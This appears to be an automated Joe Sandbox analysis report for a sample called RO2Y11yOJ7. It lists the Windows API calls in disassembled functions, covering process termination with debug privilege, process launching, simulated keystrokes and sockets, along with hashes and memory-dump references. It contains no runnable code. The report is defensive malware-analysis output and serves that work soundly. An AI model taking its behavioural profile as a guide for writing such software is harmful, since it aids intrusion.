                                                          • Opcode ID: 13eb596fd21f563ebe801493b7a0936e385a5d33cc7db1d4929248dd65be3a77
                                                          • Instruction ID: 53e489c35b11d9b50dad4d10304d5fa1316882b4e8518586fcaca81ecd41e605
                                                          • Opcode Fuzzy Hash: 13eb596fd21f563ebe801493b7a0936e385a5d33cc7db1d4929248dd65be3a77
                                                          • Instruction Fuzzy Hash: 5C417FB1540218BFEB139F50CC99FFB7BADEF09358F40412AFA059A541EB709E449BA0
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,003CF910), ref: 003B8E3D
                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003CF910), ref: 003B8E71
                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003B8FEB
                                                          • SysFreeString.OLEAUT32(?), ref: 003B9015
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                          • String ID:
                                                          • API String ID: 560350794-0
                                                          • Opcode ID: 9b7e09214d58116b5f2987a0084aa4faa7102a837d4052936bf08826c922ef7a
                                                          • Instruction ID: f689c5020d2af0a0494a31c5327012e1fa993e73f4878b8befcee82023541fea
                                                          • Opcode Fuzzy Hash: 9b7e09214d58116b5f2987a0084aa4faa7102a837d4052936bf08826c922ef7a
                                                          • Instruction Fuzzy Hash: 7BF12971A00209EFCB05DF94C888EEEB7BAFF49319F118059F615AB650DB31AE45CB50
                                                          APIs
                                                          • _memset.LIBCMT ref: 003BF7C9
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003BF95C
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003BF980
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003BF9C0
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003BF9E2
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003BFB5E
                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003BFB90
                                                          • CloseHandle.KERNEL32(?), ref: 003BFBBF
                                                          • CloseHandle.KERNEL32(?), ref: 003BFC36
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                          • String ID:
                                                          • API String ID: 4090791747-0
                                                          • Opcode ID: 77a7982efb9a0f731fc3353d487821b0582249e1391e0011d7a9210dde9881d2
                                                          • Instruction ID: 29cf0afa6f6496230cc7a9366e71a7f51c3d2da0accef29cac35d7f80716bc6c
                                                          • Opcode Fuzzy Hash: 77a7982efb9a0f731fc3353d487821b0582249e1391e0011d7a9210dde9881d2
                                                          • Instruction Fuzzy Hash: BCE1A0316043009FCB16EF24C881BAABBE5AF85314F15856DF9999F6A2CB31EC45CB52
                                                          APIs
                                                            • Part of subcall function 003A46AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003A36DB,?), ref: 003A46CC
                                                            • Part of subcall function 003A46AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003A36DB,?), ref: 003A46E5
                                                            • Part of subcall function 003A4AD8: GetFileAttributesW.KERNEL32(?,003A374F), ref: 003A4AD9
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 003A4DE7
                                                          • _wcscmp.LIBCMT ref: 003A4E01
                                                          • MoveFileW.KERNEL32(?,?), ref: 003A4E1C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                          • String ID:
                                                          • API String ID: 793581249-0
                                                          • Opcode ID: 5c0100c55002143fa7ce5cabcdaa18f2afef44d438cc61521d52d55e862740ba
                                                          • Instruction ID: 048763776a7cee782e56dbd66c084861c2c3fb950842b49d3209ca98f7784713
                                                          • Instruction Fuzzy Hash: 67515FB24087849BC726DBA4D881DDFB7ECEF85300F10492EB589D7152EF74A6888766
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003C8731
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: e4197026b66c4daa57e282195a946a2b176c546a9c250042f5d473e35f803b05
                                                          • Instruction ID: a9993e43ef25fad2f3620c59b0acc3d7363ef7893246be25e1bfe4a9dc2384bf
                                                          • Instruction Fuzzy Hash: 93518070500314BEEB229F69CC89F997BA9EB05310F604529FA15EA5E1CF71BF90DB50
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0037C477
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0037C499
                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0037C4B1
                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0037C4CF
                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0037C4F0
                                                          • DestroyIcon.USER32(00000000), ref: 0037C4FF
                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0037C51C
                                                          • DestroyIcon.USER32(?), ref: 0037C52B
                                                            • Part of subcall function 003CA4E1: DeleteObject.GDI32(00000000), ref: 003CA51A
                                                          Similarity
                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                          • String ID:
                                                          • API String ID: 2819616528-0
                                                          • Opcode ID: 1a876374560fee1d6ec8582244c5266b8b688a48c0ae4b0940c0950b2532c782
                                                          • Instruction ID: 53c9ff8de9b494ba888e06572aaf18677d0839adf9b7b508b5715ab76fc434e3
                                                          • Instruction Fuzzy Hash: 38517770610209AFDB26DF25CC45FAB3BE9EB58320F114528F906EB2A0DB70BD90DB50
                                                          APIs
                                                            • Part of subcall function 0039AC37: GetWindowThreadProcessId.USER32(?,00000000), ref: 0039AC57
                                                            • Part of subcall function 0039AC37: GetCurrentThreadId.KERNEL32 ref: 0039AC5E
                                                            • Part of subcall function 0039AC37: AttachThreadInput.USER32(00000000,?,00399945,?,00000001), ref: 0039AC65
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00399950
                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0039996D
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00399970
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00399979
                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00399997
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0039999A
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 003999A3
                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003999BA
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003999BD
                                                          Similarity
                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                          • String ID:
                                                          • API String ID: 2014098862-0
                                                          • Opcode ID: 16d02c010455337803a17e96cc880eabab6ce793b8d5607a4668f00bfdce5611
                                                          • Instruction ID: 3b99b9f3306779342064567757805a33a676d65e3fd98f041c01a6000ea0b235
                                                          • Instruction Fuzzy Hash: 9E11E171550618BFFA116B65CC89F6A7B2EEB4C755F11042AF244EB0A0CAF36C10DBA4
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00398BEC
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00398BF3
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00398C08
                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 00398C10
                                                          • DuplicateHandle.KERNEL32(00000000), ref: 00398C13
                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002), ref: 00398C23
                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 00398C2B
                                                          • DuplicateHandle.KERNEL32(00000000), ref: 00398C2E
                                                          • CreateThread.KERNEL32(00000000,00000000,00398C54,00000000,00000000,00000000), ref: 00398C48
                                                          Similarity
                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                          • String ID:
                                                          • API String ID: 1957940570-0
                                                          • Opcode ID: 64696ec4189f1d5a749e822a250b7446ad80cfef5179ad2902498c8decd8eab2
                                                          • Instruction ID: 68855f9b39adf04b2245c7b6b0e221bfe143d974aea4b16355afc086cdf9c5e6
                                                          • Instruction Fuzzy Hash: 8301B6B5240348FFEB11ABA5DC4DF6B7BADEB89711F044421FA05DB2A1CA70A800CB20
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                          • API String ID: 0-572801152
                                                          • Opcode ID: 110ec5df6e70e1d832ce8c197f7a36ebfbebd866ff9758fb50c3672c8ed6e57c
                                                          • Instruction ID: 3dc960cc8c461d998a034088babe9c757b695a3f5e4558812780ca078b5f2148
                                                          • Instruction Fuzzy Hash: 46C19271A002199FDF15CFA8C885BEEB7B9EF48318F15842AEB05EB680D7709D41CB60
                                                          APIs
                                                            • Part of subcall function 00397432: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0039736C,80070057,?,?,?,0039777D), ref: 0039744F
                                                            • Part of subcall function 00397432: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0039736C,80070057,?,?), ref: 0039746A
                                                            • Part of subcall function 00397432: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0039736C,80070057,?,?), ref: 00397478
                                                            • Part of subcall function 00397432: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0039736C,80070057,?), ref: 00397488
                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 003B991B
                                                          • _memset.LIBCMT ref: 003B9928
                                                          • _memset.LIBCMT ref: 003B9A6B
                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 003B9A97
                                                          • CoTaskMemFree.OLE32(?), ref: 003B9AA2
                                                          Strings
                                                          • NULL Pointer assignment, xrefs: 003B9AF0
                                                          Similarity
                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                          • String ID: NULL Pointer assignment
                                                          • API String ID: 1300414916-2785691316
                                                          • Opcode ID: ac40f146a95a865be4cf74206fc564dd972a34436127630bfc571e819369b057
                                                          • Instruction ID: b9d04f0b77839d0585805b6b6d3fdc2866e275b32e720984e1fd3a6d1adbb60b
                                                          • Instruction Fuzzy Hash: D6913C71D00229ABDF12DFA5DC81EDEBBB9EF08710F10415AF615AB291DB706A44CFA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003C6E56
                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 003C6E6A
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003C6E84
                                                          • _wcscat.LIBCMT ref: 003C6EDF
                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 003C6EF6
                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003C6F24
                                                          Strings
                                                          Similarity
                                                          • API ID: MessageSend$Window_wcscat
                                                          • String ID: SysListView32
                                                          • API String ID: 307300125-78025650
                                                          • Opcode ID: 3e7008b681b03da08ae65b7b5c2715b33d4a7e698217af0958a99a82e44c99d3
                                                          • Instruction ID: c2e1f7c4bb203ca310a0ce831b87f5d3e4126b747be1a2c3d985b8348f416c9c
                                                          • Instruction Fuzzy Hash: 2C419175A00308AFEB229F64CC86FEE77E9EF08350F11446EF545E7291D6729D848B64
                                                          APIs
                                                            • Part of subcall function 003A3C99: CreateToolhelp32Snapshot.KERNEL32 ref: 003A3CBE
                                                            • Part of subcall function 003A3C99: Process32FirstW.KERNEL32(00000000,?), ref: 003A3CCC
                                                            • Part of subcall function 003A3C99: CloseHandle.KERNEL32(00000000), ref: 003A3D96
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003BEAB8
                                                          • GetLastError.KERNEL32 ref: 003BEACB
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003BEAFA
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 003BEB77
                                                          • GetLastError.KERNEL32(00000000), ref: 003BEB82
                                                          • CloseHandle.KERNEL32(00000000), ref: 003BEBB7
                                                          Strings
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2533919879-2896544425
                                                          • Opcode ID: 8b1419cf0b5a513791495e3a4d6a0ac598cf3d80bf6a95233aeef6e0950c6306
                                                          • Instruction ID: 00a4ac1ca2d1c6886e1bbceae14a8eb890f11a579ffa1b0e8abb6fb7baf4784d
                                                          • Instruction Fuzzy Hash: B041AF312042019FDB16EF68CC96FAEB7A6AF80314F08845DF9429F3D2CB75A914CB95
                                                          APIs
                                                          • LoadIconW.USER32(00000000,00007F03), ref: 003A30CD
                                                          Strings
                                                          Similarity
                                                          • API ID: IconLoad
                                                          • String ID: blank$info$question$stop$warning
                                                          • API String ID: 2457776203-404129466
                                                          • Opcode ID: 12c104d76449dcdd81c7cf13e8dbef4304a315424f2fe4a55c948101dc7b4b65
                                                          • Instruction ID: a581f49a69427a81c136c5758488b310b9d4bac6bc8434028214a9163f0e0eeb
                                                          • Instruction Fuzzy Hash: 4811EB3560830BBED727DB54DC46CBA77ACDF07360F10402AF6069A181DBB16F4046A0
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003A4353
                                                          • LoadStringW.USER32(00000000), ref: 003A435A
                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003A4370
                                                          • LoadStringW.USER32(00000000), ref: 003A4377
                                                          • _wprintf.LIBCMT ref: 003A439D
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003A43BB
                                                          Strings
                                                          • %s (%d) : ==> %s: %s %s, xrefs: 003A4398
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
• Opcode ID: b1ce7d4932d05bc6247e800f17f5d7654b157bb7b2b04a013b96f670fce39c6b
• Instruction ID: b1811cc404a795d4213089fe40a7373e0f5dd1fc80b2dca7c5f9937efbab4ed2
• Opcode Fuzzy Hash: b1ce7d4932d05bc6247e800f17f5d7654b157bb7b2b04a013b96f670fce39c6b
• Instruction Fuzzy Hash: AB0162F690020CBFEB12ABA0DD89EF6776DD708301F0045A5B705E2051EA75AE954B74
APIs
  • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
• GetSystemMetrics.USER32(0000000F), ref: 003CD4E6
• GetSystemMetrics.USER32(0000000F), ref: 003CD506
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 003CD741
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003CD75F
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003CD780
• ShowWindow.USER32(00000003,00000000), ref: 003CD79F
• InvalidateRect.USER32(?,00000000,00000001), ref: 003CD7C4
• DefDlgProcW.USER32(?,00000005,?,?), ref: 003CD7E7
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID:
• API String ID: 1211466189-0
• Opcode ID: 73fda0e1e69f5ad070fa247140701fb4124f4bfab8045a302fb9af118724e6cb
• Instruction ID: 14c29d17508b38c9494555308593c1b379cda04e5d18e3ba54e32677923189e0
• Opcode Fuzzy Hash: 73fda0e1e69f5ad070fa247140701fb4124f4bfab8045a302fb9af118724e6cb
• Instruction Fuzzy Hash: E6B17835600229AFDF16CF28C989BAE7BB1BF04701F098079FC48EA699D734AD50CB50
APIs
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0037C347,00000004,00000000,00000000,00000000), ref: 00342ACF
• ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0037C347,00000004,00000000,00000000,00000000,000000FF), ref: 00342B17
• ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0037C347,00000004,00000000,00000000,00000000), ref: 0037C39A
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0037C347,00000004,00000000,00000000,00000000), ref: 0037C406
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: 705738447f2618d75423f1b692861673da10d37f1009c10dcbec123b92d828d8
• Instruction ID: 6a3b28691cf4dc348c37b394adc19c012e21ff29a0dd2220a9d3a7f86fa8f8b8
• Opcode Fuzzy Hash: 705738447f2618d75423f1b692861673da10d37f1009c10dcbec123b92d828d8
• Instruction Fuzzy Hash: A34108346147809ED7379B288C8CB6B7BDAEB45300F96C81DF84BBE960CA79B845D711
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 003A7186
  • Part of subcall function 00360F36: std::exception::exception.LIBCMT ref: 00360F6C
  • Part of subcall function 00360F36: __CxxThrowException@8.LIBCMT ref: 00360F81
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003A71BD
• EnterCriticalSection.KERNEL32(?), ref: 003A71D9
• _memmove.LIBCMT ref: 003A7227
• _memmove.LIBCMT ref: 003A7244
• LeaveCriticalSection.KERNEL32(?), ref: 003A7253
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003A7268
• InterlockedExchange.KERNEL32(?,000001F6), ref: 003A7287
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 256516436-0
• Opcode ID: edabab30acaf7512600165f8c22c0ec761835249aeb323a259ccb0474d144139
• Instruction ID: 500fcf0bff308735ec8c7f1da2d20fd9324f85238a949c573c273cbd5b6c9112
• Opcode Fuzzy Hash: edabab30acaf7512600165f8c22c0ec761835249aeb323a259ccb0474d144139
• Instruction Fuzzy Hash: 67318D75900205EFCB169F64DC86EABB7B8EF45710F1485A5F904EF24AD770AE11CBA0
APIs
• DeleteObject.GDI32(00000000), ref: 003C621D
• GetDC.USER32(00000000), ref: 003C6225
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 003C6230
• ReleaseDC.USER32(00000000,00000000), ref: 003C623C
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 003C6278
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003C6289
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003C905C,?,?,000000FF,00000000,?,000000FF,?), ref: 003C62C3
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003C62E3
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: 5d8953fee454f050aea4f053b2844568366cd8d6d881dfc7f78c1e37291ffca8
• Instruction ID: 4f1925038d13dd456aea487152f671b1515804cb82250c4b9f6154cb0e53a099
• Opcode Fuzzy Hash: 5d8953fee454f050aea4f053b2844568366cd8d6d881dfc7f78c1e37291ffca8
• Instruction Fuzzy Hash: 0B314F72201214BFEB128F54DC4AFEA3BAEEF09761F054065FE08DA291C675AC51CB64
APIs
  • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
  • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
  • Part of subcall function 0035FE06: _wcscpy.LIBCMT ref: 0035FE29
• _wcstok.LIBCMT ref: 003AED20
• _wcscpy.LIBCMT ref: 003AEDAF
• _memset.LIBCMT ref: 003AEDE2
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
• Opcode ID: 8df33dd9519e31afeaa0abc6f9c209aaea5e9e79da19d62a85aec3532011347b
• Instruction ID: b978cc1c4ccc083b08131ead198dfa84bb08b68d45a2b77e7448a628dfc1c2b4
• Opcode Fuzzy Hash: 8df33dd9519e31afeaa0abc6f9c209aaea5e9e79da19d62a85aec3532011347b
• Instruction Fuzzy Hash: 8EC15A755087409FC726EF24C881A6AB7E4FF85310F05892DF8999F2A2DB70ED45CB82
APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 003B6D16
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003B6D37
• WSAGetLastError.WSOCK32(00000000), ref: 003B6D4A
• htons.WSOCK32(?,?,?,00000000,?), ref: 003B6E00
• inet_ntoa.WSOCK32(?), ref: 003B6DBD
  • Part of subcall function 0039ABF4: _strlen.LIBCMT ref: 0039ABFE
  • Part of subcall function 0039ABF4: _memmove.LIBCMT ref: 0039AC20
• _strlen.LIBCMT ref: 003B6E5A
• _memmove.LIBCMT ref: 003B6EC3
Similarity
• API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
• String ID:
• API String ID: 3619996494-0
• Opcode ID: 8f0a325c02317ea4c783300fe17a524400f71cee90aebc8ce8bf34912233eadf
• Instruction ID: 9fcb7af9e91930ab89162ead0523cbf3c9e16a39efa384ecb23fb57c3f95d170
• Opcode Fuzzy Hash: 8f0a325c02317ea4c783300fe17a524400f71cee90aebc8ce8bf34912233eadf
• Instruction Fuzzy Hash: C7819B71504200ABD712EB24CC86FAFB7E9EB84718F144929F6559F2A2DB74ED04CB91
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e3bfc412de79de81f318a0a8dc68d09e71b5c35c43d134cda6745f1d5e4e8af8
• Instruction ID: 5b302c84451a884486485dda42479ad549744ef851bf215b9c176ec1e3c2857a
• Opcode Fuzzy Hash: e3bfc412de79de81f318a0a8dc68d09e71b5c35c43d134cda6745f1d5e4e8af8
• Instruction Fuzzy Hash: EA717A30900509EFCB16CF99CC89EBEBBB9FF85314F158159F915AA251C734AA91CFA0
APIs
• IsWindow.USER32(01745310), ref: 003CB41F
• IsWindowEnabled.USER32(01745310), ref: 003CB42B
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 003CB50F
• SendMessageW.USER32(01745310,000000B0,?,?), ref: 003CB546
• IsDlgButtonChecked.USER32(?,?), ref: 003CB583
• GetWindowLongW.USER32(01745310,000000EC), ref: 003CB5A5
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 003CB5BD
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
• Opcode ID: 739b3c665b64032864accc35d8d1790767358be0522054663f331c45718fe2dd
• Instruction ID: 9c00060e94467037b3ad01bd496e6058617b3bebb1d34de57d8b181f55cfd61c
• Opcode Fuzzy Hash: 739b3c665b64032864accc35d8d1790767358be0522054663f331c45718fe2dd
• Instruction Fuzzy Hash: 3071AD34608244AFEB269F65C896FAAFBB9EF09300F15406DE955E72A2C731AC50DB10
APIs
• _memset.LIBCMT ref: 003BF55C
• _memset.LIBCMT ref: 003BF625
• ShellExecuteExW.SHELL32(?), ref: 003BF66A
  • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
  • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
  • Part of subcall function 0035FE06: _wcscpy.LIBCMT ref: 0035FE29
• GetProcessId.KERNEL32(00000000), ref: 003BF6E1
• CloseHandle.KERNEL32(00000000), ref: 003BF710
Similarity
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 3522835683-2766056989
• Opcode ID: 2ebc004e14a27f4b0fd14d9f8593c1833dd3ed42994d6fabc67f868c35c9513a
• Instruction ID: 62f3383804e21e10282da66b7589e293a2514cde646a99470054186c2197aac8
• Opcode Fuzzy Hash: 2ebc004e14a27f4b0fd14d9f8593c1833dd3ed42994d6fabc67f868c35c9513a
• Instruction Fuzzy Hash: 1B617075A006199FCB16EF64C881AAEBBF5FF48314F15846AE855AF761CB30AD40CF90
APIs
• GetParent.USER32(?), ref: 003A12BD
• GetKeyboardState.USER32(?), ref: 003A12D2
• SetKeyboardState.USER32(?), ref: 003A1333
• PostMessageW.USER32(?,00000101,00000010,?), ref: 003A1361
• PostMessageW.USER32(?,00000101,00000011,?), ref: 003A1380
• PostMessageW.USER32(?,00000101,00000012,?), ref: 003A13C6
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 003A13E9
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: cf854c31ca6a169bf82c9ee500e14fefd5c0b2bc09a85bf95e5cc8ecc456da37
                                                          • Instruction ID: 1cab886c6676df73c8c96a6cccba69ee95ed3252bc61a61b067ffefba03edbc7
                                                          • Instruction Fuzzy Hash: BB51D3A0A147D53DFF3746388C45BBABEA99F07304F098589E1D58A8C2C2D9ECD8D750
                                                          APIs
                                                          • GetParent.USER32(00000000), ref: 003A10D6
                                                          • GetKeyboardState.USER32(?), ref: 003A10EB
                                                          • SetKeyboardState.USER32(?), ref: 003A114C
                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003A1178
                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003A1195
                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003A11D9
                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003A11FA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 5f7c454ccb05221c6f57e7b836471d9b8ff98b61f65c13fe014e7ed6c0874ac8
                                                          • Instruction ID: 841b088b3bda893d2dcfe046b6120ed7b0f818f93dbf5be18f19270c3aae47e7
                                                          • Instruction Fuzzy Hash: BB51E7A05447D63DFB378734CC45B7ABFA9DB07300F094989E1D59A8C2D294EC98E750
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
